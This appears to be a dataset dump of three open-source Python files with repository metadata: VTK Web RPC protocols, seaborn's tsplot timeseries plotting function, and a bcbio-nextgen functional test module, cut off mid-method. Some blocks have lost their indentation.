|
r"""protocols is a module that contains a set of VTK Web related
protocols that can be combined together to provide a flexible way to define
very specific web application.
"""
from time import time
import os, sys, logging, types, inspect, traceback, logging, re
try:
from vtk.vtkWebCore import vtkWebApplication, vtkWebInteractionEvent
except ImportError:
from vtkWebCore import vtkWebApplication, vtkWebInteractionEvent
from autobahn.wamp import register as exportRpc
# =============================================================================
#
# Base class for any VTK Web based protocol
#
# =============================================================================
class vtkWebProtocol(object):
    """Base class for VTK Web protocols.

    Holds a reference to the shared vtkWebApplication (set via
    setApplication) and offers id<->object mapping helpers plus
    active-view management for subclasses.
    """

    def setApplication(self, app):
        """Attach the vtkWebApplication this protocol operates on."""
        self.Application = app

    def getApplication(self):
        """Return the vtkWebApplication previously attached."""
        return self.Application

    def mapIdToObject(self, id):
        """
        Maps global-id for a vtkObject to the vtkObject instance. May return None if the
        id is not valid.
        """
        key = int(id)
        if key > 0:
            return self.Application.GetObjectIdMap().GetVTKObject(key)
        return None

    def getGlobalId(self, obj):
        """
        Return the id for a given vtkObject
        """
        return self.Application.GetObjectIdMap().GetGlobalId(obj)

    def getView(self, vid):
        """
        Returns the view for a given view ID, if vid is None then return the
        current active view.
        :param vid: The view ID
        :type vid: str
        """
        found = self.mapIdToObject(vid)
        if found:
            return found
        # Fall back to the active view when none matched the id.
        fallback = self.Application.GetObjectIdMap().GetActiveObject("VIEW")
        if fallback:
            return fallback
        raise Exception("no view provided: " + vid)

    def setActiveView(self, view):
        """
        Set a vtkRenderWindow to be the active one
        """
        self.Application.GetObjectIdMap().SetActiveObject("VIEW", view)
# =============================================================================
#
# Handle Mouse interaction on any type of view
#
# =============================================================================
class vtkWebMouseHandler(vtkWebProtocol):
    """Protocol translating JSON mouse events into VTK interaction events."""

    @exportRpc("viewport.mouse.interaction")
    def mouseInteraction(self, event):
        """
        RPC Callback for mouse interactions.

        Builds a vtkWebInteractionEvent from the JSON |event| (buttons,
        modifier keys, coordinates, scroll, action) and forwards it to the
        application; triggers 'PushRender' when the view changed.
        """
        view = self.getView(event['view'])

        buttons = 0
        if event["buttonLeft"]:
            buttons |= vtkWebInteractionEvent.LEFT_BUTTON
        if event["buttonMiddle"]:
            buttons |= vtkWebInteractionEvent.MIDDLE_BUTTON
        if event["buttonRight"]:
            buttons |= vtkWebInteractionEvent.RIGHT_BUTTON

        modifiers = 0
        if event["shiftKey"]:
            modifiers |= vtkWebInteractionEvent.SHIFT_KEY
        if event["ctrlKey"]:
            modifiers |= vtkWebInteractionEvent.CTRL_KEY
        if event["altKey"]:
            modifiers |= vtkWebInteractionEvent.ALT_KEY
        if event["metaKey"]:
            modifiers |= vtkWebInteractionEvent.META_KEY

        pvevent = vtkWebInteractionEvent()
        pvevent.SetButtons(buttons)
        pvevent.SetModifiers(modifiers)
        # "in" replaces dict.has_key(), which was removed in Python 3 and is
        # equivalent in Python 2.
        if "x" in event:
            pvevent.SetX(event["x"])
        if "y" in event:
            pvevent.SetY(event["y"])
        if "scroll" in event:
            pvevent.SetScroll(event["scroll"])
        if event["action"] == 'dblclick':
            pvevent.SetRepeatCount(2)
        #pvevent.SetKeyCode(event["charCode"])
        retVal = self.getApplication().HandleInteractionEvent(view, pvevent)
        del pvevent

        if retVal:
            self.getApplication().InvokeEvent('PushRender')

        return retVal
# =============================================================================
#
# Basic 3D Viewport API (Camera + Orientation + CenterOfRotation
#
# =============================================================================
class vtkWebViewPort(vtkWebProtocol):
    """Basic 3D viewport API: camera reset/update and axes visibility."""

    @exportRpc("viewport.camera.reset")
    def resetCamera(self, viewId):
        """
        RPC callback to reset camera.
        """
        view = self.getView(viewId)
        camera = view.GetRenderer().GetActiveCamera()
        camera.ResetCamera()
        try:
            # FIXME seb: view.CenterOfRotation = camera.GetFocalPoint()
            print("FIXME")
        except:
            pass

        self.getApplication().InvalidateCache(view)
        self.getApplication().InvokeEvent('PushRender')

        return str(self.getGlobalId(view))

    @exportRpc("viewport.axes.orientation.visibility.update")
    def updateOrientationAxesVisibility(self, viewId, showAxis):
        """
        RPC callback to show/hide OrientationAxis.
        """
        view = self.getView(viewId)
        # FIXME seb: view.OrientationAxesVisibility = (showAxis if 1 else 0);
        self.getApplication().InvalidateCache(view)
        self.getApplication().InvokeEvent('PushRender')
        return str(self.getGlobalId(view))

    @exportRpc("viewport.axes.center.visibility.update")
    def updateCenterAxesVisibility(self, viewId, showAxis):
        """
        RPC callback to show/hide CenterAxesVisibility.
        """
        view = self.getView(viewId)
        # FIXME seb: view.CenterAxesVisibility = (showAxis if 1 else 0);
        self.getApplication().InvalidateCache(view)
        self.getApplication().InvokeEvent('PushRender')
        return str(self.getGlobalId(view))

    @exportRpc("viewport.camera.update")
    def updateCamera(self, view_id, focal_point, view_up, position):
        """RPC callback updating the active camera of the given view."""
        view = self.getView(view_id)

        camera = view.GetRenderer().GetActiveCamera()
        camera.SetFocalPoint(focal_point)
        # BUG FIX: vtkCamera exposes SetViewUp/SetPosition; the previous
        # SetCameraViewUp/SetCameraPosition calls would raise AttributeError.
        camera.SetViewUp(view_up)
        camera.SetPosition(position)
        self.getApplication().InvalidateCache(view)
        self.getApplication().InvokeEvent('PushRender')
# =============================================================================
#
# Provide Image delivery mechanism
#
# =============================================================================
class vtkWebViewPortImageDelivery(vtkWebProtocol):
    """Protocol delivering rendered view images as base64-encoded JPEGs."""

    @exportRpc("viewport.image.render")
    def stillRender(self, options):
        """
        RPC Callback to render a view and obtain the rendered image.

        |options| keys: "view" (required id), and optional "size",
        "mtime", "quality", "localTime". Returns a reply dict with the
        image, its size/format/mtime and timing information.
        """
        beginTime = int(round(time() * 1000))
        view = self.getView(options["view"])
        size = [view.GetSize()[0], view.GetSize()[1]]
        resize = size != options.get("size", size)
        if resize:
            size = options["size"]
            if size[0] > 0 and size[1] > 0:
                view.SetSize(size)
        # "in" replaces dict.has_key(), which was removed in Python 3 and is
        # equivalent in Python 2.
        t = 0
        if options and "mtime" in options:
            t = options["mtime"]
        quality = 100
        if options and "quality" in options:
            quality = options["quality"]
        localTime = 0
        if options and "localTime" in options:
            localTime = options["localTime"]
        reply = {}
        app = self.getApplication()
        if t == 0:
            app.InvalidateCache(view)

        reply["image"] = app.StillRenderToString(view, t, quality)
        # Check that we are getting image size we have set; if not, re-render
        # until it matches (the render call sets the actual window size),
        # giving up after a bounded number of tries.
        tries = 10
        while resize and list(view.GetSize()) != size \
                and size != [0, 0] and tries > 0:
            app.InvalidateCache(view)
            reply["image"] = app.StillRenderToString(view, t, quality)
            tries -= 1

        reply["stale"] = app.GetHasImagesBeingProcessed(view)
        reply["mtime"] = app.GetLastStillRenderToStringMTime()
        reply["size"] = [view.GetSize()[0], view.GetSize()[1]]
        reply["format"] = "jpeg;base64"
        reply["global_id"] = str(self.getGlobalId(view))
        reply["localTime"] = localTime

        endTime = int(round(time() * 1000))
        reply["workTime"] = (endTime - beginTime)

        return reply
# =============================================================================
#
# Provide Geometry delivery mechanism (WebGL)
#
# =============================================================================
class vtkWebViewPortGeometryDelivery(vtkWebProtocol):
    """Protocol delivering WebGL scene geometry for a view."""

    @exportRpc("viewport.webgl.metadata")
    def getSceneMetaData(self, view_id):
        """Return the WebGL scene metadata of the given view."""
        target = self.getView(view_id)
        return self.getApplication().GetWebGLSceneMetaData(target)

    @exportRpc("viewport.webgl.data")
    def getWebGLData(self, view_id, object_id, part):
        """Return one binary WebGL piece (1-based |part|) of an object."""
        target = self.getView(view_id)
        app = self.getApplication()
        return app.GetWebGLBinaryData(target, str(object_id), part - 1)
# =============================================================================
#
# Provide File/Directory listing
#
# =============================================================================
class vtkWebFileBrowser(vtkWebProtocol):
    """Protocol exposing a server-side directory listing to the web client."""

    def __init__(self, basePath, name, excludeRegex=r"^\.|~$|^\$", groupRegex=r"[0-9]+\."):
        """
        Configure the way the WebFile browser will expose the server content.
        - basePath: specify the base directory that we should start with
        - name: Name of that base directory that will show up on the web
        - excludeRegex: Regular expression of what should be excluded from the list of files/directories
        - groupRegex: Regular expression used to collapse related files into groups
        """
        self.baseDirectory = basePath
        self.rootName = name
        self.pattern = re.compile(excludeRegex)
        self.gPattern = re.compile(groupRegex)

    @exportRpc("file.server.directory.list")
    def listServerDirectory(self, relativeDir='.'):
        """
        RPC Callback to list a server directory relative to the basePath
        provided at start-up.

        Returns a dict with 'label', 'files', 'dirs', 'groups' and 'path'.
        Entries matching excludeRegex are skipped; files differing only by a
        groupRegex match are collapsed into 'groups'.
        """
        path = [ self.rootName ]
        if len(relativeDir) > len(self.rootName):
            # NOTE(review): assumes relativeDir starts with rootName + '/';
            # confirm callers always send rooted paths.
            relativeDir = relativeDir[len(self.rootName)+1:]
            path += relativeDir.replace('\\','/').split('/')

        currentPath = os.path.join(self.baseDirectory, relativeDir)
        result = { 'label': relativeDir, 'files': [], 'dirs': [], 'groups': [], 'path': path }
        if relativeDir == '.':
            result['label'] = self.rootName
        # "entry" avoids shadowing the "file" builtin.
        for entry in os.listdir(currentPath):
            fullPath = os.path.join(currentPath, entry)
            if os.path.isfile(fullPath) and not re.search(self.pattern, entry):
                result['files'].append({'label': entry, 'size': -1})
            elif os.path.isdir(fullPath) and not re.search(self.pattern, entry):
                result['dirs'].append(entry)

        # Filter files to create groups
        files = result['files']
        files.sort()
        groups = result['groups']
        groupIdx = {}
        filesToRemove = []
        for fileEntry in files:
            fileSplit = re.split(self.gPattern, fileEntry['label'])
            if len(fileSplit) == 2:
                filesToRemove.append(fileEntry)
                gName = '*.'.join(fileSplit)
                # "in" replaces dict.has_key(), removed in Python 3.
                if gName in groupIdx:
                    groupIdx[gName]['files'].append(fileEntry['label'])
                else:
                    groupIdx[gName] = { 'files' : [fileEntry['label']], 'label': gName }
                    groups.append(groupIdx[gName])

        # Only keep a group when it actually collapses more than one file.
        for fileEntry in filesToRemove:
            gName = '*.'.join(re.split(self.gPattern, fileEntry['label']))
            if len(groupIdx[gName]['files']) > 1:
                files.remove(fileEntry)
            else:
                groups.remove(groupIdx[gName])

        return result
|
keithroe/vtkoptix
|
Web/Python/vtk/web/protocols.py
|
Python
|
bsd-3-clause
| 11,606
|
[
"VTK"
] |
80826b171b3126ee1e2163c853ebe5e0821611bf4fa17f08812c55ae6c719683
|
"""Timeseries plotting functions."""
from __future__ import division
import numpy as np
import pandas as pd
from scipy import stats, interpolate
import matplotlib as mpl
import matplotlib.pyplot as plt
from .external.six import string_types
from . import utils
from . import algorithms as algo
from .palettes import color_palette
def tsplot(data, time=None, unit=None, condition=None, value=None,
           err_style="ci_band", ci=68, interpolate=True, color=None,
           estimator=np.mean, n_boot=5000, err_palette=None, err_kws=None,
           legend=True, ax=None, **kwargs):
    """Plot one or more timeseries with flexible representation of uncertainty.
    This function can take data specified either as a long-form (tidy)
    DataFrame or as an ndarray with dimensions for sampling unit, time, and
    (optionally) condition. The interpretation of some of the other parameters
    changes depending on the type of object passed as data.
    Parameters
    ----------
    data : DataFrame or ndarray
        Data for the plot. Should either be a "long form" dataframe or an
        array with dimensions (unit, time, condition). In both cases, the
        condition field/dimension is optional. The type of this argument
        determines the interpretation of the next few parameters.
    time : string or series-like
        Either the name of the field corresponding to time in the data
        DataFrame or x values for a plot when data is an array. If a Series,
        the name will be used to label the x axis.
    unit : string
        Field in the data DataFrame identifying the sampling unit (e.g.
        subject, neuron, etc.). The error representation will collapse over
        units at each time/condition observation. This has no role when data
        is an array.
    value : string
        Either the name of the field corresponding to the data values in
        the data DataFrame (i.e. the y coordinate) or a string that forms
        the y axis label when data is an array.
    condition : string or Series-like
        Either the name of the field identifying the condition an observation
        falls under in the data DataFrame, or a sequence of names with a length
        equal to the size of the third dimension of data. There will be a
        separate trace plotted for each condition. If condition is a Series
        with a name attribute, the name will form the title for the plot
        legend (unless legend is set to False).
    err_style : string or list of strings or None
        Names of ways to plot uncertainty across units from set of
        {ci_band, ci_bars, boot_traces, boot_kde, unit_traces, unit_points}.
        Can use one or more than one method.
    ci : float or list of floats in [0, 100]
        Confidence interval size(s). If a list, it will stack the error
        plots for each confidence interval. Only relevant for error styles
        with "ci" in the name.
    interpolate : boolean
        Whether to do a linear interpolation between each timepoint when
        plotting. The value of this parameter also determines the marker
        used for the main plot traces, unless marker is specified as a keyword
        argument.
    color : seaborn palette or matplotlib color name or dictionary
        Palette or color for the main plots and error representation (unless
        plotting by unit, which can be separately controlled with err_palette).
        If a dictionary, should map condition name to color spec.
    estimator : callable
        Function to determine central tendency and to pass to bootstrap
        must take an ``axis`` argument.
    n_boot : int
        Number of bootstrap iterations.
    err_palette: seaborn palette
        Palette name or list of colors used when plotting data for each unit.
    err_kws : dict, optional
        Keyword argument dictionary passed through to matplotlib function
        generating the error plot,
    ax : axis object, optional
        Plot in given axis; if None creates a new figure
    kwargs :
        Other keyword arguments are passed to main plot() call
    Returns
    -------
    ax : matplotlib axis
        axis with plot data
    """
    # Sort out default values for the parameters
    if ax is None:
        ax = plt.gca()
    if err_kws is None:
        err_kws = {}
    # Handle different types of input data
    if isinstance(data, pd.DataFrame):
        xlabel = time
        ylabel = value
        # Condition is optional
        if condition is None:
            condition = pd.Series(np.ones(len(data)))
            legend = False
            legend_name = None
            n_cond = 1
        else:
            legend = True and legend
            legend_name = condition
            n_cond = len(data[condition].unique())
    else:
        data = np.asarray(data)
        # Data can be a timecourse from a single unit or
        # several observations in one condition
        if data.ndim == 1:
            data = data[np.newaxis, :, np.newaxis]
        elif data.ndim == 2:
            data = data[:, :, np.newaxis]
        n_unit, n_time, n_cond = data.shape
        # Units are experimental observations. Maybe subjects, or neurons
        if unit is None:
            units = np.arange(n_unit)
        unit = "unit"
        units = np.repeat(units, n_time * n_cond)
        ylabel = None
        # Time forms the xaxis of the plot
        if time is None:
            times = np.arange(n_time)
        else:
            times = np.asarray(time)
        xlabel = None
        if hasattr(time, "name"):
            xlabel = time.name
        time = "time"
        times = np.tile(np.repeat(times, n_cond), n_unit)
        # Conditions split the timeseries plots
        if condition is None:
            conds = range(n_cond)
            legend = False
            if isinstance(color, dict):
                err = "Must have condition names if using color dict."
                raise ValueError(err)
        else:
            conds = np.asarray(condition)
            legend = True and legend
            if hasattr(condition, "name"):
                legend_name = condition.name
            else:
                legend_name = None
        condition = "cond"
        conds = np.tile(conds, n_unit * n_time)
        # Value forms the y value in the plot
        if value is None:
            ylabel = None
        else:
            ylabel = value
        value = "value"
        # Convert to long-form DataFrame
        data = pd.DataFrame(dict(value=data.ravel(),
                                 time=times,
                                 unit=units,
                                 cond=conds))
    # Set up the err_style and ci arguments for the loop below
    if isinstance(err_style, string_types):
        err_style = [err_style]
    elif err_style is None:
        err_style = []
    if not hasattr(ci, "__iter__"):
        ci = [ci]
    # Set up the color palette
    if color is None:
        # NOTE(review): "axes.color_cycle" was removed in matplotlib 2.0 in
        # favor of "axes.prop_cycle"; confirm the supported mpl versions.
        current_palette = mpl.rcParams["axes.color_cycle"]
        if len(current_palette) < n_cond:
            colors = color_palette("husl", n_cond)
        else:
            colors = color_palette(n_colors=n_cond)
    elif isinstance(color, dict):
        colors = [color[c] for c in data[condition].unique()]
    else:
        try:
            colors = color_palette(color, n_cond)
        except ValueError:
            color = mpl.colors.colorConverter.to_rgb(color)
            colors = [color] * n_cond
    # Do a groupby with condition and plot each trace
    for c, (cond, df_c) in enumerate(data.groupby(condition, sort=False)):
        # Keyword arguments keep this working on pandas versions that no
        # longer accept positional pivot() arguments.
        df_c = df_c.pivot(index=unit, columns=time, values=value)
        # Plain ``float`` replaces the removed ``np.float`` alias.
        x = df_c.columns.values.astype(float)
        # Bootstrap the data for confidence intervals
        boot_data = algo.bootstrap(df_c.values, n_boot=n_boot,
                                   axis=0, func=estimator)
        cis = [utils.ci(boot_data, v, axis=0) for v in ci]
        central_data = estimator(df_c.values, axis=0)
        # Get the color for this condition
        color = colors[c]
        # Use subroutines to plot the uncertainty
        for style in err_style:
            # Allow for null style (only plot central tendency)
            if style is None:
                continue
            # Grab the function from the global environment
            try:
                plot_func = globals()["_plot_%s" % style]
            except KeyError:
                raise ValueError("%s is not a valid err_style" % style)
            # Possibly set up to plot each observation in a different color
            if err_palette is not None and "unit" in style:
                orig_color = color
                color = color_palette(err_palette, len(df_c.values))
            # Pass all parameters to the error plotter as keyword args
            plot_kwargs = dict(ax=ax, x=x, data=df_c.values,
                               boot_data=boot_data,
                               central_data=central_data,
                               color=color, err_kws=err_kws)
            # Plot the error representation, possibly for multiple cis
            for ci_i in cis:
                plot_kwargs["ci"] = ci_i
                plot_func(**plot_kwargs)
            if err_palette is not None and "unit" in style:
                color = orig_color
        # Plot the central trace
        kwargs.setdefault("marker", "" if interpolate else "o")
        ls = kwargs.pop("ls", "-" if interpolate else "")
        kwargs.setdefault("linestyle", ls)
        label = cond if legend else "_nolegend_"
        ax.plot(x, central_data, color=color, label=label, **kwargs)
    # Pad the sides of the plot only when not interpolating
    ax.set_xlim(x.min(), x.max())
    if not interpolate:
        # Computed lazily so a single-timepoint series with interpolate=True
        # does not raise an IndexError.
        x_diff = x[1] - x[0]
        ax.set_xlim(x.min() - x_diff, x.max() + x_diff)
    # Add the plot labels
    if xlabel is not None:
        ax.set_xlabel(xlabel)
    if ylabel is not None:
        ax.set_ylabel(ylabel)
    if legend:
        ax.legend(loc=0, title=legend_name)
    return ax
# Subroutines for tsplot errorbar plotting
# ----------------------------------------
def _plot_ci_band(ax, x, ci, color, err_kws, **kwargs):
"""Plot translucent error bands around the central tendancy."""
low, high = ci
if "alpha" not in err_kws:
err_kws["alpha"] = 0.2
ax.fill_between(x, low, high, color=color, **err_kws)
def _plot_ci_bars(ax, x, central_data, ci, color, err_kws, **kwargs):
"""Plot error bars at each data point."""
for x_i, y_i, (low, high) in zip(x, central_data, ci.T):
ax.plot([x_i, x_i], [low, high], color=color,
solid_capstyle="round", **err_kws)
def _plot_boot_traces(ax, x, boot_data, color, err_kws, **kwargs):
"""Plot 250 traces from bootstrap."""
err_kws.setdefault("alpha", 0.25)
err_kws.setdefault("linewidth", 0.25)
if "lw" in err_kws:
err_kws["linewidth"] = err_kws.pop("lw")
ax.plot(x, boot_data.T, color=color, label="_nolegend_", **err_kws)
def _plot_unit_traces(ax, x, data, ci, color, err_kws, **kwargs):
"""Plot a trace for each observation in the original data."""
if isinstance(color, list):
if "alpha" not in err_kws:
err_kws["alpha"] = .5
for i, obs in enumerate(data):
ax.plot(x, obs, color=color[i], label="_nolegend_", **err_kws)
else:
if "alpha" not in err_kws:
err_kws["alpha"] = .2
ax.plot(x, data.T, color=color, label="_nolegend_", **err_kws)
def _plot_unit_points(ax, x, data, color, err_kws, **kwargs):
"""Plot each original data point discretely."""
if isinstance(color, list):
for i, obs in enumerate(data):
ax.plot(x, obs, "o", color=color[i], alpha=0.8, markersize=4,
label="_nolegend_", **err_kws)
else:
ax.plot(x, data.T, "o", color=color, alpha=0.5, markersize=4,
label="_nolegend_", **err_kws)
def _plot_boot_kde(ax, x, boot_data, color, **kwargs):
    """Show the bootstrap distribution as a kernel density heat band."""
    # Drop the raw "data" entry; _ts_kde works on the bootstrap samples.
    del kwargs["data"]
    _ts_kde(ax, x, boot_data, color, **kwargs)
def _plot_unit_kde(ax, x, data, color, **kwargs):
    """Plot the kernel density estimate over the raw per-unit sample.

    Thin wrapper delegating the upsampling and drawing to _ts_kde.
    """
    _ts_kde(ax, x, data, color, **kwargs)
def _ts_kde(ax, x, data, color, **kwargs):
    """Upsample over time and plot a KDE of the bootstrap distribution.

    The density at each of 100 interpolated timepoints is rendered as the
    alpha channel of a constant-color image spanning the data range.
    """
    kde_data = []
    y_min, y_max = data.min(), data.max()
    y_vals = np.linspace(y_min, y_max, 100)
    upsampler = interpolate.interp1d(x, data)
    data_upsample = upsampler(np.linspace(x.min(), x.max(), 100))
    for pt_data in data_upsample.T:
        # stats.gaussian_kde is the public name; the stats.kde submodule
        # path is deprecated in modern SciPy.
        pt_kde = stats.gaussian_kde(pt_data)
        kde_data.append(pt_kde(y_vals))
    kde_data = np.transpose(kde_data)
    rgb = mpl.colors.ColorConverter().to_rgb(color)
    img = np.zeros((kde_data.shape[0], kde_data.shape[1], 4))
    img[:, :, :3] = rgb
    # Normalize each timepoint's density to [0, 1] for use as alpha.
    kde_data /= kde_data.max(axis=0)
    kde_data[kde_data > 1] = 1
    img[:, :, 3] = kde_data
    ax.imshow(img, interpolation="spline16", zorder=2,
              extent=(x.min(), x.max(), y_min, y_max),
              aspect="auto", origin="lower")
|
cwu2011/seaborn
|
seaborn/timeseries.py
|
Python
|
bsd-3-clause
| 13,239
|
[
"NEURON"
] |
ee9439b7deb1dd8a99e6cfb87c578de3df2a8f34d29177d1d81358aedd4be091
|
"""This directory is setup with configurations to run the main functional test.
It exercises a full analysis pipeline on a smaller subset of data.
"""
import os
import subprocess
import unittest
import shutil
import contextlib
import collections
import functools
from nose import SkipTest
from nose.plugins.attrib import attr
import yaml
from bcbio.pipeline.config_utils import load_system_config
@contextlib.contextmanager
def make_workdir():
    """Create a clean test_automated_output directory and chdir into it.

    Yields the directory path; the previous working directory is restored
    on exit even if the body raises.
    """
    dirname = os.path.join(os.path.dirname(__file__), "test_automated_output")
    # Always start from a pristine directory.
    if os.path.exists(dirname):
        shutil.rmtree(dirname)
    os.makedirs(dirname)
    orig_dir = os.getcwd()
    try:
        os.chdir(dirname)
        yield dirname
    finally:
        os.chdir(orig_dir)
def expected_failure(test):
    """Small decorator to mark tests as expected failure.
    Useful for tests that are work-in-progress.
    """
    @functools.wraps(test)
    def wrapper(*args, **kwargs):
        try:
            test(*args, **kwargs)
        except Exception:
            # Failing is the expected outcome: report it as a skip.
            raise SkipTest
        # The test passed, which is the surprising case here.
        raise AssertionError('Failure expected')
    return wrapper
def get_post_process_yaml(data_dir, workdir):
    """Prepare a bcbio_system YAML file pointing to test data.

    Resolution order: bcbiovm docker data directory, then an installed
    bcbio_system.yaml via load_system_config, then the bundled
    post_process-sample.yaml. A copy is written into workdir with
    galaxy_config rewritten to the test universe_wsgi.ini.

    Returns the path of the generated YAML file.
    """
    try:
        from bcbiovm.docker.defaults import get_datadir
        datadir = get_datadir()
        system = os.path.join(datadir, "galaxy", "bcbio_system.yaml") if datadir else None
    except ImportError:
        system = None
    if system is None or not os.path.exists(system):
        try:
            _, system = load_system_config("bcbio_system.yaml")
        except ValueError:
            system = None
    if system is None or not os.path.exists(system):
        system = os.path.join(data_dir, "post_process-sample.yaml")
    # create local config pointing to reduced genomes
    test_system = os.path.join(workdir, "bcbio_system.yaml")
    with open(system) as in_handle:
        # NOTE(review): yaml.load without an explicit Loader; fine for a
        # trusted local config, but yaml.safe_load would be safer.
        config = yaml.load(in_handle)
    config["galaxy_config"] = os.path.join(data_dir, "universe_wsgi.ini")
    with open(test_system, "w") as out_handle:
        yaml.dump(config, out_handle)
    return test_system
class AutomatedAnalysisTest(unittest.TestCase):
"""Setup a full automated analysis and run the pipeline.
"""
    def setUp(self):
        # Small test datasets bundled under tests/data/automated.
        self.data_dir = os.path.join(os.path.dirname(__file__), "data", "automated")
    def _install_test_files(self, data_dir):
        """Download required sequence and reference files.

        Each tarball is fetched from S3 and unpacked next to data_dir.
        An already-present directory is reused unless its VERSION file is
        missing or older than the expected version, in which case it is
        removed and re-downloaded.
        """
        DlInfo = collections.namedtuple("DlInfo", "fname dirname version")
        download_data = [DlInfo("110106_FC70BUKAAXX.tar.gz", None, None),
                         DlInfo("genomes_automated_test.tar.gz", "genomes", 27),
                         DlInfo("110907_ERP000591.tar.gz", None, None),
                         DlInfo("100326_FC6107FAAXX.tar.gz", None, 9),
                         DlInfo("tcga_benchmark.tar.gz", None, 3)]
        for dl in download_data:
            url = "http://chapmanb.s3.amazonaws.com/{fname}".format(fname=dl.fname)
            # Target directory defaults to the tarball name without .tar.gz.
            dirname = os.path.join(data_dir, os.pardir,
                                   dl.fname.replace(".tar.gz", "") if dl.dirname is None
                                   else dl.dirname)
            if os.path.exists(dirname) and dl.version is not None:
                version_file = os.path.join(dirname, "VERSION")
                # No VERSION file means the data predates versioning: stale.
                is_old = True
                if os.path.exists(version_file):
                    with open(version_file) as in_handle:
                        version = int(in_handle.read())
                    is_old = version < dl.version
                if is_old:
                    shutil.rmtree(dirname)
            if not os.path.exists(dirname):
                self._download_to_dir(url, dirname)
    def _download_to_dir(self, url, dirname):
        """Fetch a tarball with wget, unpack it, and move it into dirname."""
        # Python 2 print statement (module predates Python 3 support).
        print dirname
        cl = ["wget", url]
        subprocess.check_call(cl)
        cl = ["tar", "-xzvpf", os.path.basename(url)]
        subprocess.check_call(cl)
        # The tarball unpacks to basename(dirname) in the cwd; relocate it
        # to the requested location and clean up the downloaded archive.
        shutil.move(os.path.basename(dirname), dirname)
        os.remove(os.path.basename(url))
    @attr(speed=3)
    def IGNOREtest_3_full_pipeline(self):
        """Run full automated analysis pipeline with multiplexing.

        XXX Multiplexing not supported in latest versions; the IGNORE
        prefix keeps the test runner from collecting this method.
        """
        self._install_test_files(self.data_dir)
        with make_workdir() as workdir:
            cl = ["bcbio_nextgen.py",
                  get_post_process_yaml(self.data_dir, workdir),
                  os.path.join(self.data_dir, os.pardir, "110106_FC70BUKAAXX"),
                  os.path.join(self.data_dir, "run_info.yaml")]
            subprocess.check_call(cl)
@attr(speed=3)
def IGNOREtest_4_empty_fastq(self):
"""Handle analysis of empty fastq inputs from failed runs.
XXX Multiplexing not supporting in latest versions.
"""
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110221_empty_FC12345AAXX"),
os.path.join(self.data_dir, "run_info-empty.yaml")]
subprocess.check_call(cl)
@attr(stranded=True)
@attr(rnaseq=True)
def test_2_stranded(self):
"""Run an RNA-seq analysis with TopHat and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "test_stranded"),
os.path.join(self.data_dir, "run_info-stranded.yaml")]
subprocess.check_call(cl)
@attr(rnaseq=True)
@attr(tophat=True)
def test_2_rnaseq(self):
"""Run an RNA-seq analysis with TopHat and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110907_ERP000591"),
os.path.join(self.data_dir, "run_info-rnaseq.yaml")]
subprocess.check_call(cl)
@attr(fusion=True)
def test_2_fusion(self):
"""Run an RNA-seq analysis and test fusion genes
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "test_fusion"),
os.path.join(self.data_dir, "run_info-fusion.yaml")]
subprocess.check_call(cl)
@attr(rnaseq=True)
@attr(rnaseq_standard=True)
@attr(star=True)
def test_2_star(self):
"""Run an RNA-seq analysis with STAR and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110907_ERP000591"),
os.path.join(self.data_dir, "run_info-star.yaml")]
subprocess.check_call(cl)
@attr(rnaseq=True)
@attr(rnaseq_standard=True)
@attr(hisat2=True)
def test_2_hisat2(self):
"""Run an RNA-seq analysis with hisat2 and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "110907_ERP000591"),
os.path.join(self.data_dir, "run_info-hisat2.yaml")]
subprocess.check_call(cl)
@attr(explant=True)
@attr(singleend=True)
@attr(rnaseq=True)
def test_explant(self):
"""
Run an explant RNA-seq analysis with TopHat and generate gene-level counts.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "1_explant"),
os.path.join(self.data_dir, "run_info-explant.yaml")]
subprocess.check_call(cl)
@attr(srnaseq=True)
@attr(srnaseq_star=True)
def test_srnaseq_star(self):
"""Run an sRNA-seq analysis.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-srnaseq_star.yaml")]
subprocess.check_call(cl)
@attr(srnaseq=True)
@attr(srnaseq_bowtie=True)
def test_srnaseq_bowtie(self):
"""Run an sRNA-seq analysis.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, "run_info-srnaseq_bowtie.yaml")]
subprocess.check_call(cl)
@attr(chipseq=True)
def test_chipseq(self):
"""
Run a chip-seq alignment with Bowtie2
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "test_chipseq"),
os.path.join(self.data_dir, "run_info-chipseq.yaml")]
subprocess.check_call(cl)
@attr(speed=1)
@attr(ensemble=True)
def test_1_variantcall(self):
"""Test variant calling with GATK pipeline.
"""
self._install_test_files(self.data_dir)
with make_workdir() as workdir:
cl = ["bcbio_nextgen.py",
get_post_process_yaml(self.data_dir, workdir),
os.path.join(self.data_dir, os.pardir, "100326_FC6107FAAXX"),
os.path.join(self.data_dir, "run_info-variantcall.yaml")]
subprocess.check_call(cl)
@attr(speed=1)
@attr(devel=True)
def test_5_bam(self):
"""Allow BAM files as input to pipeline.
"""
self._install_test_files(self.data_dir)
